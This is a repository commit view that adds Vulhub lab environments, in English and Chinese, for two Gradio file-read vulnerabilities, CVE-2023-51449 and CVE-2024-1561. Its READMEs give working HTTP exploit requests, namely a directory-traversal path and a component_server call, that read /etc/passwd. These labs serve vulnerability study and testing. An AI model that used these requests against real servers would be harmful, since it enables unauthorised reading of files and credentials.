aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
gradio/CVE-2023-51449/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 22 KiB

BIN
gradio/CVE-2023-51449/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 43 KiB

55
gradio/CVE-2023-51449/README.md Normal file
View File

@@ -0,0 +1,55 @@
# Gradio File Path Traversal (CVE-2023-51449)
[中文版本(Chinese version)](README.zh-cn.md)
Gradio is a Python library that allows users to quickly build visual web interfaces for machine learning models without writing any front-end code.
In Gradio versions 4.11 and below, when authentication is not enabled, an attacker who knows the file path can use a public URL to access arbitrary files on the server running the Gradio application.
References:
- <https://github.com/gradio-app/gradio/pull/6833>
- <https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2>
## Environment Setup
Execute the following command to start an application built with Gradio 4.10.0:
```
docker compose up -d
```
After the server starts, authentication is disabled by default. You can access the application at `http://your-ip:7860`.
## Vulnerability Reproduction
First, use the upload interface to upload any file and obtain an accessible file path.
```
POST /upload HTTP/1.1
Host: localhost:7860
Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
-----------------------------250033711231076532771336998311
Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
Content-Type: application/octet-stream
123456
-----------------------------250033711231076532771336998311--
```
![](1.png)
Once you have an accessible file path, use the `/file` interface with directory traversal to read arbitrary files from the server, such as `/etc/passwd`:
```
GET /file=/tmp/gradio/7c4a8d09ca3762af61e59520943dc26494f8941b/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: localhost:7860
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.36
Connection: close
Accept-Encoding: gzip
```
![](2.png)

52
gradio/CVE-2023-51449/README.zh-cn.md Normal file
View File

@@ -0,0 +1,52 @@
# Gradio 目录穿越漏洞CVE-2023-51449
Gradio是一个Python库允许用户无需编写前端代码即可为机器学习模型快速构建可视化Web界面。
在 Gradio 4.11 及更早版本中如果未启用身份验证知道文件路径的攻击者可以使用公共URL访问运行Gradio应用程序的服务器上的任意文件。
参考链接:
- <https://github.com/gradio-app/gradio/pull/6833>
- <https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2>
## 环境启动
执行如下命令启动一个由Gradio 4.10.0编写的应用:
```
docker compose up -d
```
环境启动后,默认未开启身份验证。你可以通过`http://your-ip:7860`访问该应用。
## 漏洞复现
首先使用upload接口上传任意文件获取一个可访问的文件路径。
```
POST /upload HTTP/1.1
Host: localhost:7860
Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
-----------------------------250033711231076532771336998311
Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
Content-Type: application/octet-stream
123456
-----------------------------250033711231076532771336998311--
```
![](1.png)
获得可访问的文件路径后利用file接口配合目录穿越即可读取服务器上的任意文件例如`/etc/passwd`
```
GET /file=/tmp/gradio/7c4a8d09ca3762af61e59520943dc26494f8941b/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: localhost:7860
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.36
Connection: close
Accept-Encoding: gzip
```
![](2.png)

5
gradio/CVE-2023-51449/docker-compose.yml Normal file
View File

@@ -0,0 +1,5 @@
services:
web:
image: vulhub/gradio:4.10.0
ports:
- "7860:7860"

BIN
gradio/CVE-2024-1561/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 37 KiB

BIN
gradio/CVE-2024-1561/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 22 KiB

BIN
gradio/CVE-2024-1561/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 46 KiB

62
gradio/CVE-2024-1561/README.md Normal file
View File

@@ -0,0 +1,62 @@
# Gradio Arbitrary File Read (CVE-2024-1561)
[中文版本(Chinese version)](README.zh-cn.md)
Gradio is a Python library that enables users to rapidly build web-based interfaces for machine learning models without writing any front-end code.
In Gradio versions prior to 4.13, the `component_server` endpoint allows attackers to invoke arbitrary methods of the `Component` class. By abusing the `move_resource_to_block_cache` method, an attacker can copy any file from the server to a temporary directory and then retrieve its contents, leading to arbitrary file read.
References:
- <https://github.com/gradio-app/gradio/pull/6884>
- <https://nvd.nist.gov/vuln/detail/CVE-2024-1561>
## Environment Setup
Execute the following command to start an application written by Gradio 4.12.0:
```
docker compose up -d
```
After the environment is started, authentication is not enabled by default. You can access the application through `http://your-ip:7860`.
## Vulnerability Reproduction
First, access the `/config` endpoint to obtain a component's `id` value, such as `3`.
```
GET /config HTTP/1.1
Host: 127.0.0.1:7860
```
![](1.png)
Next, use the `move_resource_to_block_cache` method to copy `/etc/passwd` to a temporary directory. The response will include the temporary file path.
```
POST /component_server HTTP/1.1
Host: 127.0.0.1:7860
Content-Type: application/json
{
"component_id": "3",
"data": "/etc/passwd",
"fn_name": "move_resource_to_block_cache",
"session_hash": "aaaaaaaaaaa"
}
```
![](2.png)
Finally, access the `/file` endpoint with the returned path to read the file content.
```
GET /file=/tmp/gradio/916eb712d668cf14a35adf8179617549780c4070/passwd HTTP/1.1
Host: 127.0.0.1:7860
```
![](3.png)
If successful, the contents of `/etc/passwd` will be displayed, demonstrating arbitrary file read.

59
gradio/CVE-2024-1561/README.zh-cn.md Normal file
View File

@@ -0,0 +1,59 @@
# Gradio 任意文件读取漏洞CVE-2024-1561
Gradio是一个Python库允许用户无需编写前端代码即可为机器学习模型快速构建Web界面。
在Gradio 4.13版本之前,`component_server`接口允许攻击者调用`Component`类的任意方法。攻击者可以利用`move_resource_to_block_cache`方法,将服务器上的任意文件复制到临时目录,并进一步读取其内容,从而实现任意文件读取。
参考链接:
- <https://github.com/gradio-app/gradio/pull/6884>
- <https://nvd.nist.gov/vuln/detail/CVE-2024-1561>
## 环境启动
执行如下命令启动一个由Gradio 4.12.0编写的应用:
```
docker compose up -d
```
环境启动后,默认未开启身份验证。你可以通过`http://your-ip:7860`访问该应用。
## 漏洞复现
首先,访问`/config`接口,获取一个组件的`id`字段,例如`3`
```
GET /config HTTP/1.1
Host: 127.0.0.1:7860
```
![](1.png)
然后,利用`move_resource_to_block_cache`方法,将`/etc/passwd`文件写入临时目录,接口会返回临时文件路径。
```
POST /component_server HTTP/1.1
Host: 127.0.0.1:7860
Content-Type: application/json
{
"component_id": "3",
"data": "/etc/passwd",
"fn_name": "move_resource_to_block_cache",
"session_hash": "aaaaaaaaaaa"
}
```
![](2.png)
最后,通过`file`接口拼接返回的路径,即可读取文件内容。
```
GET /file=/tmp/gradio/916eb712d668cf14a35adf8179617549780c4070/passwd HTTP/1.1
Host: 127.0.0.1:7860
```
![](3.png)
如果操作成功,即可看到`/etc/passwd`的内容,证明漏洞存在。

5
gradio/CVE-2024-1561/docker-compose.yml Normal file
View File

@@ -0,0 +1,5 @@
services:
web:
image: vulhub/gradio:4.12.0
ports:
- "7860:7860"